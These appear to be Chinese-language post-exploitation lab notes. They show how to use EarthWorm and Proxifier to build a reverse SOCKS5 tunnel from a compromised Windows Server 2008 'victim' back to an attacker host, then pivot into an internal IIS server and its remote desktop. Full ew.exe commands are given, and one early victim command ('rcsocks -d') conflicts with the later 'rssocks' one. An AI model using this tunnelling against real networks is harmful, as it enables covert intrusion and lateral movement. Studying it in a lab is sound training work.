EarthWorm是一款用于开启 SOCKS v5 代理服务的工具,基于标准 C 开发,可提供多平台间的转接通讯,用于复杂网络环境下的数据转发。
Proxifier是一款功能非常强大的socks5客户端,可以让不支持通过代理服务器工作的网络程序能通过HTTPS或SOCKS代理或代理链。
- 反向
- 攻击者
ew.exe -s rcsocks -l 1080 -e 8888
受害者win2008
ew.exe -s rcsocks -d 攻击者ip -e 8888
实验环境:
- Windows Server 2008 R2 x64(192.168.70.128、10.1.1.1)
- Windows Server 2003(10.1.1.2)
- IIS服务器
- EarthWorm
- proxifier
环境搭建:
为win2008添加一块网卡,ip设为10.1.1.1
将win2003的网络选成VM1
将ip设为10.1.1.2
将win2003的IIS服务器写上网页内容,并且保证win2008能够访问到
两台机器开启均开启远程桌面
将EarthWorm上传到win2008上
模拟实验:
进入ew所在目录cd E:\学习资料\后渗透\day0318\ew
输入ew_for_Win.exe -s rcsocks -l 1080 -e 8888
win2008中输入ew.exe -s rssocks -d 192.168.0.14 -e 8888
然后proxifier代理ip设为127.0.0.1端口为1080
连接成功后会有大量数据传输
此時远程桌面也是可以连接的